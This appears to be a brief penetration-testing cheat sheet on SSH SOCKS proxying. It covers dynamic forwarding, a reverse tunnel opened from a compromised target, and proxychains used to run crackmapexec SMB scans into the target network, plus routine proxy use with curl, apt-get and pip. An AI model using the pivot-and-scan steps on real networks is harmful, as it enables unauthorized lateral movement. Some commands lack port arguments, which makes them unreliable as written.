SSH Socks Proxy

SSH comes with a SOCKS5 proxy feature

Local Port -> Distant -> Net

ssh -D usr@DISTANT

Distant Port -> Local -> Net

Use case: execute ssh command from target side, the port shows up on attacker side, then use proxychains to forward requests
# Target side
ssh -R usr@DISTANT

# Attacker side
echo -e '[ProxyList]\nsocks5 8888'>/tmp/TARGET
proxychains -q -f /tmp/TARGET crackmapexec smb TARGET_NETWORK

Proxy Usage

curl --socks5 HOST:PORT

apt-get -o Acquire::socks::proxy "socks5://HOST:PORT" update

#   Install :
#   $ apt-get install proxychains4
#   Then replace default "socks4 9050" with "socks5 HOST PORT" into /etc/proxychains4.conf
proxychains4 curl

python3 -m pip --proxy socks5:HOST:PORT install --upgrade aiohttp